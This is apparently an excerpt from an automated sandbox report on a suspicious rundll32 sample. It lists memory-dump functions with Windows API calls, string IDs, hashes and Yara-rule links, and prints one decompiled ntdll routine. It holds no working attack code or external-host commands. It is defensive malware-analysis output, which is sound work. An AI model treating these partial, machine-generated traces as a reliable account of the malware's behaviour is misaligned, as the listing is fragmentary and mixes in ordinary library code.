                                                                                                            Function 00F49040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                            • Opcode ID: 215b19bddea81435d5224da545529a08d6a64b0dfd9c11655316229168a666ad
                                                                                                            • Instruction ID: ed5792a2e06208ab825b463b2a447f69d54a9c33ce3a5b7d8ccf781ae2a7213d
                                                                                                            • Opcode Fuzzy Hash: 215b19bddea81435d5224da545529a08d6a64b0dfd9c11655316229168a666ad
                                                                                                            • Instruction Fuzzy Hash: 0A318DB2606605ABD711DFA4CCA1FA7BBB8AF88740F00811DFA1A9B241D774B445DBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F49037 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                            • Opcode ID: 04c5a535b47fbfbd50fc024da2203db0aaefd2cc744b1eee45dd09721f7a5b1c
                                                                                                            • Instruction ID: 9bf14daf50530ab1a1d6c29f47acbd11c50fa519421ab76a82da7d9882574a24
                                                                                                            • Opcode Fuzzy Hash: 04c5a535b47fbfbd50fc024da2203db0aaefd2cc744b1eee45dd09721f7a5b1c
                                                                                                            • Instruction Fuzzy Hash: 0621D2B1A05701ABDB10DF64CCA5FA7BBB8AF88710F00811DFA1D5B242D3B4A445DBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F433CB Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000,00000000,00F33D06,00000000), ref: 00F433E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID: @J7<
                                                                                                            • API String ID: 2538663250-2016760708
                                                                                                            • Opcode ID: eb880784737637f98270d908878796ead3c1379255f7ac2758fb1b1d950f1674
                                                                                                            • Instruction ID: 74cf2007bf81e68f43e20747e783aec28ac01b196801a6c2b071cec0112d422d
                                                                                                            • Opcode Fuzzy Hash: eb880784737637f98270d908878796ead3c1379255f7ac2758fb1b1d950f1674
                                                                                                            • Instruction Fuzzy Hash: 9D3141B5A0060A9FDB00DFE8CC809EEB7B9FF88314B108559E915E7214D775EE05DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F433D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000,00000000,00F33D06,00000000), ref: 00F433E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID: @J7<
                                                                                                            • API String ID: 2538663250-2016760708
                                                                                                            • Opcode ID: 1fa09532fb2b5a3a5954a22ab9115c51151649d85fef2957f40b42fac02cb22d
                                                                                                            • Instruction ID: 0bb28935a5a9c6a994f55879b5e3f65570fcb5650750595c6ceb8776087a1d1c
                                                                                                            • Opcode Fuzzy Hash: 1fa09532fb2b5a3a5954a22ab9115c51151649d85fef2957f40b42fac02cb22d
                                                                                                            • Instruction Fuzzy Hash: 48314DB5A0060AAFDB00DFD8CC809EEB7B9BF88304B108559E915AB214D775EE058BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F37690 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00F376EA
                                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00F3770B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
                                                                                                            • Opcode ID: a5a03663b22be56ae204ec87fc5445488013839a9c5d56cc86ec064fed115688
                                                                                                            • Instruction ID: 122c585160b2fd2e6ad9d5b416a101bd301e79177f2bd5bc950538ae819f9c83
                                                                                                            • Opcode Fuzzy Hash: a5a03663b22be56ae204ec87fc5445488013839a9c5d56cc86ec064fed115688
                                                                                                            • Instruction Fuzzy Hash: A201A771A813287BE721B6949C43FBE776CAB41B60F040115FF04BA1C1E6D8790557E5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F3A150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00F3A1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Load
                                                                                                            • String ID:
                                                                                                            • API String ID: 2234796835-0
                                                                                                            • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                            • Instruction ID: c5b70214d675566f88ba736b4d7326a1a4eda310d07a2d88cc2ba623f4642635
                                                                                                            • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                            • Instruction Fuzzy Hash: 61015EB6E0020DABDB10EAA0DC42F9EB7789B54318F0041A4ED0897241F635EB04DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A69D Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00F4A6F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            • Opcode ID: 623166a12656b14f7b67eb1e1a0608c99733ecab3f98aca32ef78b50281aa18c
                                                                                                            • Instruction ID: bc6fdcc502b246d3d44e4b2a531c1e2fdf2c1ed31a55c5388ef92786987f3ea5
                                                                                                            • Opcode Fuzzy Hash: 623166a12656b14f7b67eb1e1a0608c99733ecab3f98aca32ef78b50281aa18c
                                                                                                            • Instruction Fuzzy Hash: 4C0192B6210108ABCB54CF99DC85EEB77A9AF8C354F158258BA4D97251D630E851CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00F4A6F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                                                                            • Instruction ID: f1d8084b2b8014f03774648efd703a6a228113d74a867b102d928d0d0626da3e
                                                                                                            • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                                                                            • Instruction Fuzzy Hash: 3701AFB6210108ABCB54DF89DC80EEB77ADAF8C754F118258BA0D97251C630E851CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F49170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00F3D300,?,?), ref: 00F491AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            • Opcode ID: 74806ea384eeeb949799d0daaf11035463f3d7aed59ea106eacbabf827d0b76c
                                                                                                            • Instruction ID: c542724abb6b7c3d06211182d16e4a0374a045fb55248fdf17425d6d13a3ff09
                                                                                                            • Opcode Fuzzy Hash: 74806ea384eeeb949799d0daaf11035463f3d7aed59ea106eacbabf827d0b76c
                                                                                                            • Instruction Fuzzy Hash: 38E06D3338130437E22065A99C02FA7B68C9B80B20F14002AFB0DEA2C1D995F80112E4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A663 Relevance: 1.5, APIs: 1, Instructions: 35processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00F4A6F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            • Opcode ID: e050474d9ca0ee21108c173b4b6cb3a63942f03922dded94674eda313db17ce8
                                                                                                            • Instruction ID: 9df48c61aaf3139f166ea34bd54b683450dd21d310b1b0096ab9e50557bffaef
                                                                                                            • Opcode Fuzzy Hash: e050474d9ca0ee21108c173b4b6cb3a63942f03922dded94674eda313db17ce8
                                                                                                            • Instruction Fuzzy Hash: 41F0DFB2214008AB8B44DF9CEC80CEB73ADEF8C214B458608FA0DD3254C630EC128BA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F49163 Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00F3D300,?,?), ref: 00F491AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            • Opcode ID: f0b38f4dc3f0186194dedbd59e6ec9fbe4b04b768ff0446a02641e5d71d7e1c6
                                                                                                            • Instruction ID: 16fd2d8a16f7db5e5328376944fb197b7494c328758b6745c0dd04219f438148
                                                                                                            • Opcode Fuzzy Hash: f0b38f4dc3f0186194dedbd59e6ec9fbe4b04b768ff0446a02641e5d71d7e1c6
                                                                                                            • Instruction Fuzzy Hash: 69F09B7378174437E330A5648C43F977A58DFD5F20F14015EFA4DAA1C2D9D5B50157A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A784 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F3D5D2,00F3D5D2,?,00000000,?,?), ref: 00F4A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: a22183032ce568132cd632b8e56578c2a860b9728e854ab8411d6452cd713bae
                                                                                                            • Instruction ID: 22340c773398cfa5f2a23daecb36e75956d59a005fab6d94a5a7f659a7cbb39e
                                                                                                            • Opcode Fuzzy Hash: a22183032ce568132cd632b8e56578c2a860b9728e854ab8411d6452cd713bae
                                                                                                            • Instruction Fuzzy Hash: 1AE092B52102086FDB10DFA8CC44EE73769DF84654F114155FD4C5B241C931E84587F2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00F45196,?,00F4590F,00F4590F,?,00F45196,?,?,?,?,?,00000000,00000005,00000206), ref: 00F4A61D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                                                                            • Instruction ID: 820e5c5c50a31bfa0ba414c3e3a3b48c06c2c7f300223d025d0a5753cfc6ef57
                                                                                                            • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                                                                            • Instruction Fuzzy Hash: BDE04FB52002046BDB14DF89DC45E9737ACEF88754F018154FE085B241C530F914CBF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00F4A65D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                                                                            • Instruction ID: 33efa50230179cf2ccdcc711c3b263d432a54cb7863cf37513a9ad150b88130b
                                                                                                            • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                                                                            • Instruction Fuzzy Hash: 44E046B5200208AFDB14EF89DC49EA73BACEF88760F118158FE085B252C630F914CAF1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00F3D5D2,00F3D5D2,?,00000000,?,?), ref: 00F4A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                                                                            • Instruction ID: b012ab63052d245a1791aaced2df65a1cca690af142f5d93995afd5052826e18
                                                                                                            • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                                                                            • Instruction Fuzzy Hash: BEE01AB52402086BDB10DF89CC45EE737ADAF89664F018154BE0857241C530E8148AB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F3DA3E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008003,?,?,00F38243,?), ref: 00F3DA6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 5a551d80a4083e28110e8012284c8ae4a1e4c37754f2aa61b36d96ea9e7fc66f
                                                                                                            • Instruction ID: acf1cffede293358b2c8fb233bb5ef7b2ea9a26c2682878dabf9660eda2c246a
                                                                                                            • Opcode Fuzzy Hash: 5a551d80a4083e28110e8012284c8ae4a1e4c37754f2aa61b36d96ea9e7fc66f
                                                                                                            • Instruction Fuzzy Hash: B1D0A79196C3842AFF21F7F15D43F5B3E544B01A60F1947ADE948BA4C3D88CD1155235
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F3DA40 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008003,?,?,00F38243,?), ref: 00F3DA6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                                                                                            • Instruction ID: 03fceb51d49e6e86f41cec2f117d81229da57483d38f99411a1b20b2a22632ee
                                                                                                            • Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                                                                                            • Instruction Fuzzy Hash: D9D0A77164030437FA10E6E49C43F2632CC9B48F50F054064FA09E73C3E958F5004164
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: ed3508fa7e73912aad1717b312f0cf5c05b111d3021d2869c38ce59b3c8cb626
                                                                                                            • Instruction ID: 36c0f50812ad6c9620d480ba26b632f2bcb562b9a73ff282c775b9d545c1b2ba
                                                                                                            • Opcode Fuzzy Hash: ed3508fa7e73912aad1717b312f0cf5c05b111d3021d2869c38ce59b3c8cb626
                                                                                                            • Instruction Fuzzy Hash: 33B09BB19014C5C5D611D7605708B37791177D5745F57C456D2020641A477CC0D1F6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 0523FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E0523FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E051ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05235720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05235720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                            0x0523fdda
                                                                                                            0x0523fde2
                                                                                                            0x0523fde5
                                                                                                            0x0523fdec
                                                                                                            0x0523fdfa
                                                                                                            0x0523fdff
                                                                                                            0x0523fe0a
                                                                                                            0x0523fe0f
                                                                                                            0x0523fe17
                                                                                                            0x0523fe1e
                                                                                                            0x0523fe19
                                                                                                            0x0523fe19
                                                                                                            0x0523fe19
                                                                                                            0x0523fe20
                                                                                                            0x0523fe21
                                                                                                            0x0523fe22
                                                                                                            0x0523fe25
                                                                                                            0x0523fe40

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0523FDFA
                                                                                                            Strings
                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0523FE01
                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0523FE2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                            • API String ID: 885266447-3903918235
                                                                                                            • Opcode ID: 3ed59f9033ab8f59da76567c98928ca3b97000cc9dfee756dfc8de8faf2096d6
                                                                                                            • Instruction ID: 7a7828c711a847314d1032592a18e6da992b3a224d95ec86fbd4d81b4c7ca5d9
                                                                                                            • Opcode Fuzzy Hash: 3ed59f9033ab8f59da76567c98928ca3b97000cc9dfee756dfc8de8faf2096d6
                                                                                                            • Instruction Fuzzy Hash: 0FF0CDB6660601BBEB241A45DC46E23BF6AEF44730F240214F628561E1EAA2A86096E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%